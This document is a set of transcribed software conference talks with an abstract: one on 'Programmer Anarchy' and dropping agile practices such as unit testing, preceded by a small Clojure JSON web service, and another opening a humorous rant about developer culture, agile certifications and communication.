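        [:post "/clicks"] (do (swap! clicks conj (json/parse-string (slurp body) true))
                              {:status  201
                               :headers {"Content-Type" "application/json"}
                               :body    (json/generate-string {:stored (count @clicks)})})
        ;; return everything recorded so far
        [:get "/clicks"]  {:status  200
                           :headers {"Content-Type" "application/json"}
                           :body    (json/generate-string @clicks)}
        ;; anything else
        {:status  404
         :headers {"Content-Type" "application/json"}
         :body    (json/generate-string {:error "not found"})}))

    (defn -main []
      (run-jetty handler {:port 8080 :join? false}))

At that size, the point the talk is making holds: if the service turns out to be wrong, throwing it away and rewriting it — in the same language or a different one — is often cheaper than maintaining an elaborate harness around it.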
It's hard to get 100 lines of code wrong. If you can't get 100 lines of code right, you're in the wrong profession. And what if I write 100 lines of code and there's something wrong with it? Well, rewrite it. Throw it away and start over again. I don't need the unit test to show me what I'm breaking if I make a change. I just rewrite it and deploy it, and the business metrics will tell me whether it works or not. So all of a sudden the architecture has eliminated a lot of stuff that's overhead. To some degree, testing is not lean. It's extra work you're doing just in case something goes wrong. Every time you say "just in case", you're not lean anymore. What you're really trying to trade off is fast feedback versus defect prevention. Testing is defect prevention. Fast feedback is preferred. So we deploy constantly. We just put it out there live. Well, did anybody look at it? No? Is it working? Yeah, okay, we're fine. Not working? We have the business metrics to judge it. Fine, let's take it back off. The business metrics told us this must be a bad idea, let's take it back off. And we'll rewrite it. I pick this piece of code up, it's in Clojure. Oh my goodness, I can't read Clojure. Fine, we'll rewrite it in Ruby, I don't care. It's like a hundred lines of code. It's got a JSON interface, it accesses MongoDB. I don't care what language you write it in. I'll write it in Visual Basic, I don't care. And so you have this flexibility. Of course the programmers don't tend to use Visual Basic; they tend to use their latest cool language. They get excited by it, they try it out, we learn things, and we're happy with that. Continuous integration — well, of course that goes away because we're doing continuous deployment. I've always thought continuous deployment is kind of the holy grail. Putting something live every three and a half minutes — very cool stuff. So that one sort of goes away. So now you can understand why we say we're agile: because we believe in the agile manifesto, we believe in feedback and communication. All these things are true, but these practices actually slowed us down in a lot of ways, and we started discarding them. And I can tell you, the first time I heard that we weren't running unit tests, I was going, but how can you get away with that? And it's like, how many lines of code is it? I'm like, but... you know, and it turns out they're right again. I should say that, of course — I'll actually say that later, so I'll save that one. Yeah, this is a reality check. So this wraps up that part of the story. First of all, anarchy has been implemented to a different extent by every team. Well, first of all, it's anarchy. You can't dictate how anarchy works, any more than you can tell pirates how they're supposed to organize. So we let the teams basically figure out how they want to do things themselves. And again, the teams stir themselves around periodically. Good practices tend to move around pretty well. Bad practices tend to be identified quickly. And to some degree that's based upon their talent and experience, and to some degree their apprehension. So there's always a little bit of fear for new guys coming in about what are you allowed to do, what are you not allowed to do, where's the manager, who's going to sign this off. They ask these silly questions and it's like, nobody. But, but I need a laptop. So go get one. But it's expensive. I don't care. You think you need it? Yeah, well go get it. Why are you asking?
And it doesn't take very long before they get the idea. I would say even our best anarchists will turn around and try to ask permission occasionally. And we always say yes. And then we ask them, why are you even bothering to ask me? Even our managing director is very cool about that. And the summary, I think, is true: commercial success is driving this. I do believe that with the particular managing director we have — he's actually now 33, I think — he's a gambler anyway. I think if we were losing money, he would think the only way I can ever make money again is probably to continue to do crazy stuff like this. I mean, he is of that nature. But it does help to make money, because nobody actually will question that. I should also acknowledge that fundamentally I am not the guy that came up with programmer anarchy. I will claim responsibility for the name. We can talk about why that's an interesting name, but I came up with the name. Really it was actually watching these guys do the work. We've got some very young guys that are doing this. Mike Jones is the one who wrote the Clojure version the second time. He had a new baby, he was at home, he was getting bored, so he wrote a new version in Clojure. I don't know what his home life looks like, but this is an interesting world. But they did that. And to some degree, we were enabled by two individuals. Carl Gaywood, no university degree, he's 27 now. He's the one that's making most of our money. Neil Hutchinson is our founder. He's now 33. They had an interesting conversation one day. Carl is making all this money, and Neil is looking at it and says, oh, you're making a lot of money, Carl. Hey, you need some more programmers. And Carl says, Neil, I don't think I need any more. I don't know what to tell them to do. And Neil said, take them anyway. They happened to be Mike Jones and Paul Ingles, those two guys. So he took some guys and, lo and behold, he makes more money. I mean, a lot more money. So they have another conversation. And Neil says, Carl, take some programmers. And Carl says, I don't know what I'm going to do with them. I don't know what to tell them to do. He says, I don't know. Take them anyway. Again, he makes more money. Okay, now think about that conversation. When was the last time the managing director was pushing resources to a project? Isn't it usually the other way around, where you're begging for something and you can't get it? This guy's pushing it the other way. That's how strange the culture is, to some degree. Now why did anarchy work? It turns out when I gave Carl these bright programmers that he couldn't tell what to do, they figured out what they wanted to do themselves. They started experimenting. Hence was born anarchy. In fact, Carl himself was the first anarchist. Carl was originally a programmer. And the first thing he did when he joined the organization was say, I don't know what I did yesterday. I don't know if I made money yesterday. So he started analyzing Google reports and building little spreadsheets for that, and did more and more of that. And a colleague looks at it like, ooh, do you know what I did yesterday? And he says, yeah, I'll just pull the data into the same reports. Whoa. And all of a sudden we started driving ourselves around our daily information. The feedback cycle was starting. And Carl writes some more tools and some other stuff like that. So basically he was our first anarchist. We just turned him loose and said, make money. And we got out of his way.
And he didn't understand that you should just bring more people on like that. When you threw the other guys in there, he couldn't give directions. And all of a sudden they start doing clever things that he wouldn't have thought of — anarchy. So that's the story. The name of the presentation is Programmer Anarchy. I do have a cheesy logo. Actually, we do have t-shirts with this on them as well. But yeah, power to the programmers. I think I have a bit of time for questions. Any questions from a Norwegian audience? I get a lot of questions on this, by the way. Those guys over there ask questions. How do you get the stuff in that leads to the backlog? Backlog is, pardon the term, intellectual masturbation. Tell me what you need next. All this other stuff about trying to prioritize and make a list of everything you might need in the future — you're wasting your time. You can probably tell me, as a real business owner, what do you need? What's the most important thing next? Now, you may have this list in your head, but why are you trying to share it with me? I don't need that information. Tell me what you need. To some degree, we let some of the clients we work with create backlogs and have all sorts of meetings about that. We let them hold all the meetings they want to. It's completely useless. Just tell us what you want to do next. That's all we care about. One of the conversations I had with our founding guy very early on was — I come out of IBM, I've got 17 years in IBM, I understand strategies. So I said, Neil, what's our strategy? And he said, our strategy next year is to make twice as much money. I'm like, dude, that's not a strategy. So we go around a few times on that. Sure enough, next year we double our money. Next year I say, what's the strategy? Well, Neil says, the strategy is we're going to double our money again. I'm like, Neil, that's not a strategy. He doubles his money. Third year, I don't even ask the question anymore. There was a Harvard Business Review article a few years ago that said a company that has a very crisp strategy will probably go out of business, because they will constrain the opportunities they will pursue. It becomes a self-imposed set of rules. So to some degree, I'm very comfortable with an organization that has no rules about what we do next. And so the concept of a backlog, and fitting it perfectly into a strategic plan, and all these other things — complete nonsense. You probably want to ignore them. Trust your people to go do the work. Another question. Yes, sir? How does this scale? Actually, I would claim that anarchy is the only thing that scales. Where's the need for anything else? But aren't there limitations with a group of people — once you're more than about 160 people in a group, you're not able to know what everybody does? Yeah, so DRW Trading has 400 programmers, four managers, and they're running anarchy. This is Dan North and his company. Facebook, I would claim, is 2,000 programmers running the same way. Look at Facebook. All of a sudden you see the press: oh my goodness, Facebook releases a feature, compromises privacy. You go to these Facebook guys and say, okay, well, who lets you do this? And they're like, I'm sorry, we didn't ask permission from anybody. We just do it. They're anarchists. And they say, we read the same trade press you read. If it turns out it's a bad idea because people say so, we listen and we change it.
Now meanwhile, you got MySpace over there saying, oh, this is a good Facebook feature. Let's put it in our plan. Let's have a meeting about that. Let's put it into schedule. They're getting ready to actually, you know, how to get that development. And I'm like, oh my goodness, they got a new feature. Let's go do that. And never did anything. It turns out time to market is very important, almost more important than getting it perfect. In other words, you don't need to get it perfect. You just need to get it pretty good. And if the market tells you it's pretty good, accept that as a judgment. And so I would say Facebook is doing it in 2000. Now if you want structure and rules and allegations like that, you can put them in place, but you're going to find out putting the hierarchy back in place. It's going to become empowerment versus anarchy. So I would say anarchy just scales. Two teams use different technology. I don't care. One uses Chef, one uses Puppet. I don't care. Should we use one thing? Probably, but if Puppet's the best and knowledge will spread around and Puppet will win or Chef will win. It's natural selection. But we're not going to try to force it. Our CTO left a few years ago. We didn't replace him. While we were replacing him, he was trying to make rules. We needed to make rules. We were perfect comfort in making our own rules or no rules in this case. So I think it scales because we're not trying to resolve disagreements. That's where you need to scale. That's where you need structure. We don't need the structure. Put bright people together, they'll figure it out. By the way, I think it was a comment in the last session that I attended about, you know, if somebody doesn't work out, whether they're not performing right, we kick them off. We kick them out. Well, and we've got UK restrictions about firing people like everybody else does. We buy them out. We're like, here's a big check. Go away. And they'll use it, go away. But they're hurting us, you know, so get out of the way. We have to pay attention where the team says that, you know, HR jumps in, make it happen. Other questions? Yes? A small question about your organization. Is it still developer driven or do you have people that have to know how about the user flow so you don't feel too complicated using interfaces and things like that? And if so, where are they in the organization? The user experience people are baked into the teams. And so we have the guy, one of the guys, Andy Kent at the top of the list. Andy Kent just has a natural way of building amazing user flows as well as being a killer programmer. He's originally a web designer. He's got the JavaScript. He went on to a lot of the languages. He can write closure. Just an amazing guy. I have gotten awards for my UI design by copying one of his. And I don't mind copying. I mean, I copy all the time. But, you know, that's how good some of this stuff is. So we make sure we have that sort of people baked into the team. And that's, again, they'll hire that. They say, you know, we need some more user experience people. They're hiring. You hire who you want. Let's go find a bright guy doing this. So again, they understand what they need and they'll go get it. The business owners. Yes. What response will they have? They need to provide us a vision. I mean, to some degree, there's also business metrics. We're in web businesses. We have contracts with energy firms. There's a lot. I mean, there's 370 people in and forward. And of which, probably 70 of which are programmers. 
And they're running their own little subculture within this. I've got a call center — they're running traditional style. I've got marketing people — they have titles. Certainly people going out and buying services from contractors have to have titles, or they can't get in the door. You know, they're labels, and we give them the labels they need. So it's not only development; mostly it's in development. I would say we're lean — let's say lean slash agile — across our entire organization. HR has a card wall they use for recruiting people. Finance has a card wall when they're trying to do various things. You know, here's a story: I need to get ready for the weekly audit. So that's a story. They place story cards, they have stand-ups, they do all the stuff like that. So they're working their way through the agile process as well. That's the nice thing about starting with 35 people when I joined — and we're 370 now — we were able to put these processes in place. In fact, again, a brilliant founder. He hired me because I worked for ThoughtWorks at the time. We walked in and did a project for them. They're thinking, oh, I hired this high-tech company, and the first thing he sees is we're taking these index cards, gluing them to his wall and writing all over them with crayons. And they're like, where's the high-tech, dude? You know? But we delivered. He was like, okay, there's some magic there. I don't understand it myself, but he does believe it actually works. And so the first thing he did when he hired me was say, I want my whole organization agile. I said, okay, well, I figure I'll do that. And so we had a class about all this stuff, taught people stories and how to write stories, even though they're not stories about programming. It's still a great technique. So yes, we did the same thing. Sorry, a long answer to a short question. Thanks. You're welcome. Another question? Yes? Well, yeah, I think this is a way of working that I'm probably never going to go away from, because it's just incredibly efficient. I think now, versus when I was writing code maybe five or ten years ago — I mean, I've got the Amazon cloud, I've got Heroku, I've got ways in which I can constantly deploy without all of the overhead. And I think not taking advantage of that is leaving money on the table. And time to market — we learned this in business school a long time ago, time to market is really important. But I didn't understand you could make that a day. Not in the world I grew up in at IBM. But a day? I mean, regularly we have a programmer who will get two new business requirements and then deploy the same day he gets them. I mean, he's never heard about these requirements before. He gets them and he's got something deployed the same day. That's how fast we're running. And I think I would never work in a business where the simple organization structure would work. There are no interesting problems there. If I go back to the Cynefin model, I'm a guy who loves complex. I'm in this no-cause-and-effect world. Let's try some levers, let's play. That's my world. I love that world. In fact, if it's not a chaotic environment I'm working in, I will tend to create chaos just to make it interesting for me. They learned that at IBM. So I was moved from role to role, because as soon as the chaos started to settle down and got to be routine, they knew to get me out of there. Because I'd only kind of mess it up again.
So again, I think it aligns up with what I like doing. What you like doing, you may be, you may like, you know, you're toast buttered on one side and be perfectly buttered every morning and you may want to live in a different sort of the world. But this is the world I like to live in. All right. I think I'm out of time. I'll certainly hang around for a little longer. If you want to have questions or tell me this is just crazy. But we're making a lot of money. So not bad at all. Thank you very much.
|
The Agile movement shifted the relationship between clients and developers in a profound way. In waterfall processes, clients specified large amounts of functionality, then nervously faded into the background until the fateful day-of-delivery. With Agile, developers strove to engage with clients continuously, and delivered much more frequently against their needs. A new trust was established. At the Forward Internet Group in London, we are implementing a second major shift between clients and developers. The trust of the clients in developers evolves into a broader trust of the developers to deliver business value without resorting to a series of well-defined stories. In essence, the business has empowered the developers to do what they think is right for the business. This model, popularized by Facebook, has several labels, but the one we prefer for our flavor is Programmer Anarchy. We will start with stock Agile, and begin to apply environmental factors that led us to drop “standard” Agile practices. We will also watch as well-defined Agile roles evaporate completely as other environmental factors are applied. Finally, we will arrive at Programmer Anarchy, an organization often following none of the standard Agile practices, having no BA or QA roles, and even missing any managers of programmers. We will summarize our environmental factors, and postulate on the required and optional factors. We will make bold, controversial assertions. We will back up these assertions with actual experiences. Programmer Anarchy has garnered rave reviews at every conference venue, and is provoking the intended debate on our current Agile thinking. Target Audience Agile-Lean practitioners who are feeling the "warts" in their implementations; programmers and project managers.
|
10.5446/50967 (DOI)
|
Yeah, I'll catch you if you fall except if you fall backwards, right? I had a whole bunch of jokes prepared that had to do with the hanging stage and then they tell me I'm in this room So is it nine? You've all got such serious faces. Oh, this is your face when you're having fun. I have a whole group of friends that have come from all the way from Australia, right? Australia is sitting in the front row. So if you needed to see what Australians look like, except this guy, he's Polish. Okay, so good morning. Had a good party last night? This is just reinforcing my talk even more. The title of the talk is somehow it's disturbing because I was really pissed off when I suggested that I give this talk at NDC. That kind of passed. So I didn't know I had put here welcome my prima donnas, but I thought no, I'll just put welcome and that way I'll be very, very neutral and safe because you should be safe for your life, right? No, you shouldn't. Anyway, how was the party last night? Good? Yes? Good. Okay, that's good. I like you because you like you show me. Yeah. Did you? Did you drink a lot? Okay. Are you hungover? Okay, so this is the wrong talk for you then because I'm going to set your expectations of this talk. I want you to know exactly what to expect. Okay. And it's pretty much nothing. This talk does not have any content. It does not have any takeaways. In fact, I was just coming by the booth, walking past Pluralsight and they said, are you ready? I'm like, I don't know what I'm talking about. And they said, well, tell them that they can come by the booth and win an iPad. I'm like, well, there's content for you. So your takeaway is you can win an iPad at Pluralsight, right? But seriously, it's just think of this talk as if you don't know me, I'm a nice guy, but sometimes I'm known to rant. And this is like me ranting in a bar, except none of us have having beers or drinking anything. So it's going to be a little bit harder to put up with me. Okay. Me, I'm a developer. I'm a technical evangelist at JetBrains. You all know the company JetBrains. Please appreciate that anything I say here has nothing to do. I do not represent my company. So don't stop using reshoppers as soon as you leave the room or any of our other tools. But today, I'm not a developer. Okay. Today, I'm not a developer. In fact, as a technical evangelist, a lot of my time is spent in what some would call the marketing department. You know, the ones that we hate as developers, right? Yes? Yes, we do. Bastards along with the sales people, right? Today, I'm pissed off. And this is this could be considered child abuse, because that's my that's my third son. He's around three months old. And it took me quite a while to take that picture to the point that my wife was getting really pissed off. And she's like, you want to know what pissed off is take a picture of me. That was the best shot I could get off him. So but I don't want to talk about me. I want to talk about you guys, right? Do you remember this guy? Right? The developers, developers, developers, you all remember that know how we were the center of attention. Yeah, how we were we were going to change the world. Right? You remember this guy? How many of you know this? Who knows this guy? Right? For those of you that don't know this guy, this is Steve Sinovsky. Okay, can you please switch off the recording at this moment in time? How many of you love silverlight? How many of you hate silverlight? Okay, so you love this guy because he hates it silverlight as well. 
He's he's one he's the guy that runs Windows division. He's the one that runs office division. No one knows him when we talk about Microsoft as developers, we know Steve Ballmer. Nobody knows him. We have him to thank for Visual Studio no longer being free. Maybe we don't know. But he's going to rule our life from now on. If we're staying in the Microsoft space. Okay, he's responsible for this. How many of you know Visual Studio 2012? How many of you hate uppercase? How many of you are passionately hating uppercase? How many of you spent a vast majority of your time arguing about uppercase? How many of you think that's sad? And when will you start stopping? You won't, right? Because if they make it lower case, you'll say yeah, but the font sucks. It's sad, right? Because before, you know, we were developers. Anybody old enough to know what that is? Well, or has a grandfather or father that was a developer that used a punch card, dressed in suits? Yeah, now we're all kind of, you know, we look different. I had a meeting with a guy with my sales team at JetBrains. We had an internal sales meeting. And he was making a presentation. And he was talking about the developers in the company. And he put that picture up. This is what sales and marketing think of us. Right? Some of us actually look like this at some point in our lives. Some of us still do. This one is really funny. So is this one. In fact, there is a movie online, which I recommend you watch, which is called Erlang, declarative real time programming now. And you don't know if it's real or it's a Monty Python sketch. Seriously. And these are the two actors in it. These are real people, they're developers, right? And then at some point, you know, Hollywood gets wind of us. You remember this guy in Revenge of the Nerds? Yeah. And then Hollywood continues to get wind of us. The only difference is that now longer, we no longer a geek, we're a what? A hipster. There's actually a hipster corner out there. If you're a hipster, go there. Right? Which represents the reality. You know, how many others open up their stock market, debut with a hoodie. But we're not like that. You know, you can't stereotype people. This is these are real developers. I asked for some pictures of real developers. I mean, look at them. They look like you and I. Yeah, we even have one of them in the crowd over here, the one with goat beard. I mean, some of them actually look cool even. You wouldn't say these are developers, right? So you can't stereotype us. But what are we doing? We are stereotyping ourselves. We're starting to classify ourselves as different types of developers, developers, right? And the typical stereotyping of developers is the enterprise developers, right? Which were just like a plain vanilla box. We're as boring as it gets. I mean, really, really boring. Then we have the hipsters, which if you go to Wikipedia, that's what a hipster looks like. Okay, it is. That's the definition of a hipster. I don't see any hipsters here. Any hipsters? So we're all the square box, right? We're all rectangles. So you can say, well, these are the two kind of categories of developers that the world is pushing onto us. There is a third one. But I don't consider that development. And that's my friend Sahil. You all know Sahil Malik. I greatly respect him. But he's a chef point. I won't say developer. We were actually having dinner last night. And he was telling us about his boring life, how he's ordered the same meal for three years, the same exact meal. 
He says, that's how much I love Iranian food. I'm like, yeah, I was born in Iran, but I don't even do that. You spend all your life in SharePoint dealing with lists. That's it. That's the highlight of that development. Okay, but fortunately for us, this is about to change, right? We're no longer going to make this separation, because Microsoft has joined us. Right? If you go to the Meet Azure website, which was launched yesterday, this is the front page. Have you noticed something? The large corporate enterprise Microsoft represents has a picture of a hipster with a Mac. Okay. Yeah, we're trying to get hip. Right? We're trying to bridge this gap. We're trying to stop stereotyping and categorizing, because it doesn't do anyone any good. But you can be none of this and you can be the most awesome developer in the world, the Ninja developer. Right? How many of you are Ninja developers? Right? I mean, think about it. What other profession in the world categorizes themselves as ninjas? I'm a Ninja brain surgeon and I'm going to do your brain. Right? Or how about Jose, the Ninja plumber? Seriously? I mean, why? Why? Why are we categorizing ourselves as ninjas? We have this obsession with ninjas and mastery and masonry and katas and martial arts. Huh? And unicorns. Oh, yes, unicorns and lolcats. Right? I mean, what other profession does this? Well, there is one. Right? The actors on stage, the prima donnas, the, you know, center of attention, the Hollywood people, you know? And talking about Hollywood, there is Twitter. How many of you are on Twitter? Right? How many followers have you got? 100? 500? More than a thousand? 10,000? Right? You know, the more time you spend on Twitter, the more followers you get. And you start to feel really important. Right? Holy cow. I have 500 followers and I've only done 500 tweets. That's one tweet per follower. Ooh, now I've got 10,000 followers. Ooh, now I've got 20,000. Shit. Now I'm at 45,000. I must be important. I mean, if I have 45,000 people following me, I must be saying something important. Right? Something really, really important. That's life changing. I am influencing people, especially if you sign in with Klout. Klout tells you what you're influential about. Right? If you say, I'm going to go and eat pizza, you're influential about pizza. And as your followers grow, you start to believe that this is really important. And my existence is no longer about software development. It's about guiding others. It's about leading the path for others and making sure they know what to do, because I'm saying important things. There is a Twitter account that all it does is say, Bong. And when it's two o'clock, it says Bong Bong. It's got 226,000 followers. There are Twitter accounts of people that are well known that have 100,000 followers and that haven't tweeted. It's kind of like, if you ever saw Forrest Gump — how many of you have seen Forrest Gump? Right? Remember when he's running? He's running. He's running. And everyone's chasing him. And everyone's following him across the country. And then he suddenly stops and everyone's waiting for him to say that big moment. He turns around and says, I'm going home now. Right? Everyone's waiting for these important figures to say something and they never do. If you want something said, follow Bong Bong. Or if you don't like them, follow the office chair. They're much more valuable. Or the common squirrel. Really, Twitter has made us think that we're really important. We're not. Even in this age of micro-celebrities, we are... 
We're nothing. We're a drop in the ocean. I mean, nobody came to my hotel screaming, but they did go to Justin Bieber's hotel screaming. You know, our profession is something else. Our profession is about solving problems. It's not about being a ninja, but it's good. Right? By the way, Twitter has given us something. It's made us expert procrastinators. Right? Between Twitter and Facebook and arguing on different mediums and forums, we have become experts in that. So it has provided something valuable. Fortunately, some of us, including my friend, have actually realized that there are better ways to do it. Right? He delegates it. And he doesn't even read his tweets anymore. Right? It's kind of like, oh, do you know what TL;DR stands for? How many know what that stands for? It's like: too long, didn't read. Just give me the summary. Twitter has made us that way. Now you go to blog posts and there's no longer a blog post, there's just a summary. It's like: TL;DR, Windows Azure is bullshit. That's it. That's what my blog post is saying. Right? It's making us lazier. You're accustomed to Twitter, so you don't read anymore. But it's good. It's fun. It's because we care. Right? I mean, how many of you care about your profession here? Damn right, we care. Well, half of the room didn't put up their hand. I wasn't expecting that. Damn right, we care. Oh, Jesus. How many of you have been forced into software development? Okay. So that half of the room is probably SharePoint developers? Right. So that's why you're pissed off at me. That's why I'm getting these looks. Okay. We care. We do care. See, back in the old days, we just used to get shit done. Right? And then they told us about agile. I'm not going to take a dig at agile. No one gets away today. Right? You know what agile is? You all know what agile is. How many of you are following agile methodologies? Right? Individuals and interactions over processes and tools. That's the first one. Let's just concentrate on that one for a moment. Okay? This one. And we talk about scrum. How many of you do scrum? Yeah. You do the burn down charts and you do the iterations and you do this and you do that and everything's great and everything's cool. I used to teach scrum. I used to do coaching on scrum. Right? I used to, you know, teach people how to do scrum. And I used to go to companies and I would tell them about scrum. You know the first thing they would do? A week later when I would leave, I'd call back and say, how's it going? Oh, it's excellent. I'm like, yeah? He says, yeah, we got these little post-its with our company logo on them. I'm like, okay, good. Like, yeah, but we've got a distributed team, so we're going to write our own software to manage it. We're going to do a scrum board. Suddenly the focus shifted from trying to improve to the tooling. Right? But then after a while, we realized that scrum doesn't work because, oh, wait, well, that's because we weren't certified. So you can become a certified scrum master in a two day course. Right? And then you can teach others to become scrum masters. Really think about that for a moment. How the hell am I going to become a certified master in two days? Honestly, how? Paying cash, right? Because we use the word master — as in mastery, as in being a master of something — in two days. But then we thought that the scrum thing doesn't work either, because there is this concept of a time box. And we feel restricted, right? 
I mean, we started to see that these two week iterations aren't enough, because we get exposed to outside external forces, whether it's a bug, whether it's a customer change, because not everything is ideal in this ideal world that they paint for us. And they said, okay, well, that doesn't work. But you know Toyota — we do have an obsession with Japan — Toyota does lean. And lean is about controlling the flow. Right? We need the flow to go. And this concept of iterations, just forget about that. It's all good. We'll do Kanban. And now we got Kanban boards. And now we got everyone and their mother writing software for Kanban boards, including us. Right? And people start to work on this Kanban or lean. And they say to us, oh, I can't use your software. Why? Oh, because there is no Kanban board. Okay. Okay. There is a focus on the tool. No, but it's not about the tool. The Kanban board shows me the flow. Fair enough. But what was great two years ago is now crap. We've evolved, obviously, we've learned from our mistakes. But we keep focusing on process, process, process. But the funny thing is that this restriction of the time box, some say that that's a good thing. Do you know the Pomodoro technique? How many of you have heard of that? Right? How many of you use it? Okay. So the Pomodoro technique basically says take your egg timer — the pomodoro, the tomato, in Italian — and you turn it around and it's like 25 minutes. And you prevent any interruptions during these 25 minutes. And you get your work done. Right? You're taking away self-discipline and putting it in the hands of a tomato. Right? Because we always need someone else to help us, because we're so lacking in self-discipline. And then if it doesn't work, we'll say, no, it's not my fault. It's the tomato's fault because the 25 minutes weren't enough. No, the problem is that you weren't a certified Pomodoro master. You can get certified. Really? You can. You pay money and you will become a certified Pomodoro master. And then you can teach other people to turn egg timers. Right? And then you can join the world of Pomodoro, where you can be a user, a reporter, a speaker, a team member. Me and my family, we're a bunch of Pomodoros. We make a great team. I'm not making this shit up. I swear. It's there. And I was thinking about this the other day. I said, wait, they said to us that the Pomodoro is good because it restricts you in time. And they said to us, Scrum is bad because it is restrictive. What if I take Scrum and Pomodoro together? Maybe that would work. What do you think we could call that? Give me a wild suggestion. Scrum-O-Doro, that's a bloody good idea, isn't it? Too bad someone else had that idea. Look at the date. I actually picked this up on my way to Oslo. I'm like, no. I mean, this damn talk is writing itself. All I got to do is just sit on Twitter and let the bullshit pour in. Scrum-O-Doro. I mean, come on, enough is enough. We really are losing it. We have become so obsessed with agile and lean and agile and lean and this and that and that and this, always looking for the next excuse to solve our problems instead of concentrating on the damn problem. And then, of course, we have the divorce of agile from software. A couple of years ago, I was at a conference in the US. It's called the Agile Conference, right? And there was like 5,700 speakers, 10,000 talks. It was like five talks on software. It was all about process and process and agile and this and that and that and that. Why the hell did we do this? Who did this? 
A bunch of software guys wrote this manifesto and we've completely lost touch. Even on InfoQ, on the website, Uncle Bob and others protested and they said, guys, we've lost touch with our roots. And it was true. We revolved so much around the process that we lost touch. And Uncle Bob — who loves Uncle Bob? I mean, you can't not love this guy, right? And I am eternally grateful to this guy, because he has taught me a lot. Him, Michael Feathers, other people that I look up to in the software profession. And he talks about craftsmanship, right? We talk about craftsmanship and everyone realizes what Uncle Bob is saying: that you have to care about your profession. But yes, you have to care about your profession, whatever your profession is, no? Right? Except if you're a SharePoint developer. Okay. You have to care, right? I mean, how many of you are in this for the money? How many of you would stay in this if there wasn't any money? He's like, maybe. Yeah, families. Yeah, you don't have kids, right? No, the one behind you. No, there you go. You can just go and hang out by the hipster booth. Yeah. Right? But the problem is that now we get into craftsmanship, and craftsmanship is about what? It's about caring about code. It's about clean code. It's about unit testing. It's about test driven development. And we start to care about these things. And then we start to have these wars on principles. Damn you to hell. You didn't use the single responsibility principle. I have been in the profession for 50 years and I have never read the Gang of Four book. And I'm successful in my life. Oh, well, you're an idiot. Blah, blah, blah. And this and that. And it's just — I mean, really, look at what you're arguing about. It's good to be passionate, but don't forget what we're doing. What are we here to do? I asked that once of a guy, of a team at a company I was at. They make software, CRMs, etc. And I said to him, what is it that you're here to do? And he says, sell software. I said, no. What is it that you're here to do? Make new versions? No. You're here to help people. You're here to solve their problems. You're not here to have debates that are meaningless. And we're very good at that. Testing acronym wars, right? Test driven development, acceptance test driven development, behavior driven development, framework driven development. Do you know what framework driven development is? It's: oh, I've just come up with a cool framework, which is different to your framework because instead of assert it says should, right? Because TDD is different from BDD, so I need a BDD framework. Bullshit. TDD and BDD — and I wrote about this, and I know Dan might disagree with me — are not different. If you're a developer, they're not. What Dan has contributed is great. He has made it apparent that BDD can be about other people understanding tests and using them as specifications. For me, BDD has always been about communication. It's about communicating with people, right? That's what it's been about. But now, software developers, the first thing we do is we're like, oh, well, TDD, right? Now there's this BDD thing. Oh, you know what I'll do? I'll write a framework and then I'll become rich and famous on this framework — well, you won't anyway, because it's open source — without truly understanding what it is you're trying to do. And then you get other people looking at your frameworks, and then we start to make this artificial distinction. 
And then we start to have wars about how TDD is better than BDD, or is it ATDD? What are you doing? Should you do ATDD? No, take a course on BDD and come and do BDD while your other department does TDD. And they're so lame, because TDD is so last week, right? And the point of all this is to communicate with the customers, understand them better, implement software that works. That's why we get crap like this come up, right? This is from Zed Shaw. He is pissed off and he's fed up with all the manifestos. He's through with XP, he's through with agile. He just wants programming, MF, right? This is real. This is actually a website. It's called programming, dash, the whole word, dot com. And this is what you get, right? Now he's got a point. How many times are we going to continuously put the blame on others for our mistakes, right? How many of us have continuously bitched about all the processes which were not agile — waterfall, this, that? Before all that, how many of you were still delivering working software? You were. You've improved, yes, but don't lose the plot. You're still about delivering software for people. That's what we do. The other thing that agile points to is interactions, right? You know what a prerequisite is for interactions? Communication. Communication. You know, have you heard communication is key? How many of you have heard that? Yeah? In an agile team, it's not about tools. It's about communication. Communication is fundamental. Communication is key. That's the important thing. The only problem in software is communication. There's only two problems in software, and it's communication. That's a funny line, right? What are you doing to improve communication in your team? Oh, I'm doing my daily stand-ups. Ah, good. So you speak for five minutes, yes. You have an actual structure of what you say, yes. What I worked on yesterday, what I'm working on today. What else do you do? I talk to the guy next to me. Ah, what does he do? He's a developer. Okay. Who else do you communicate with? My wife. She doesn't understand me. Do you know what my dream would be? What? To have a wife that's a developer. Why? Well, then we can sit on the sofa and talk about programming languages. Yeah, don't broaden your horizons there. No, no, no. And you know, of course, what they say, right? We are introverts, right? We are by and large introverts. Who is an introvert? Now, a true introvert wouldn't raise their hands, no. Well, but fair enough, we are introverts and that is fine. And I'm not putting down introverts. Well, I'm not. Today I'm marketing. Okay, standing up here, I'm a marketing guy. It's not bad being an introvert, and we shouldn't push introverts out of their comfort zone, right? But there is a myth around introverts, right? Introverts cannot communicate. We have a hard time communicating. That is a myth and we know it. Go to Hacker News. Right? The amount of time we spend debating, in a more or less sensible fashion, with sensible words, over absolute bullshit is incredible. We don't have a hard time communicating. The only issue is we like to communicate in an intelligent way — not that everyone else is stupid, but we kind of measure our words and we think well about our words before we communicate. And we spend hours on end discussing semicolons. This is just a search for semicolon. And this is about Douglas Crockford, if you haven't heard: someone said in one commit on GitHub that, well, there's a bug in this library, and he said, no, there isn't a bug — he's left out a semicolon. 
This sparked all this. And this is just one fraction of the internet. The Twitter wars and the GitHub wars and all these wars over a semicolon. Just use the damn thing and shut up already. No, really, why? Oh, well, Douglas Crockford was rude. Well, no shit. I mean, the guy knows what he's talking about, and he says the code is crap because it doesn't have a semicolon, and he's right. Oh, no, no. Oh, it's not about what he said. It's about the way he said it. Yes, coming from a developer who knows how to communicate, right? No, really, why would you care about semicolons unless you write JavaScript? The problem is that we hate small talk, right? Who loves small talk? Who has kids? Who has to go to birthday parties of kids from school? So where my kids go — I live, if you don't know, in the pit of failure, otherwise known as the biggest crash ever in Europe: Spain. There was a big property boom there, and a lot of the people around me were part of it. A lot of people there talk about property, right? A lot of people are in real estate one way or another. And I go to these things and I'm like, oh, God, what am I going to talk to them about? Right? The highlight of my great time there is someone says to me, I've got this problem in my computer. I'm like, yes, now I can say something. Otherwise, I have no idea. I hate football, you know, which is the national pastime in Spain. Well, I mean, what am I going to say to these people? How many of you have felt like that? Right? And you go to a party, you're like, God, I hope I find another developer there. Right? And then we're like — so the only way we start to talk bullshit is if we drink enough. Okay, now why? Because who the hell are we communicating with all day? What are you doing in your job to improve your communication? What are you doing? If all you're doing is talking to developers, do you think anyone outside of a developer understands you? Are you comprehensible? Small talk is not bad. Learning to be social is not a bad thing. You can't always expect to talk to people on the same level as you. And I don't mean intellectually, I mean in the same arena. You have to learn to talk to people that have different interests, because it helps the 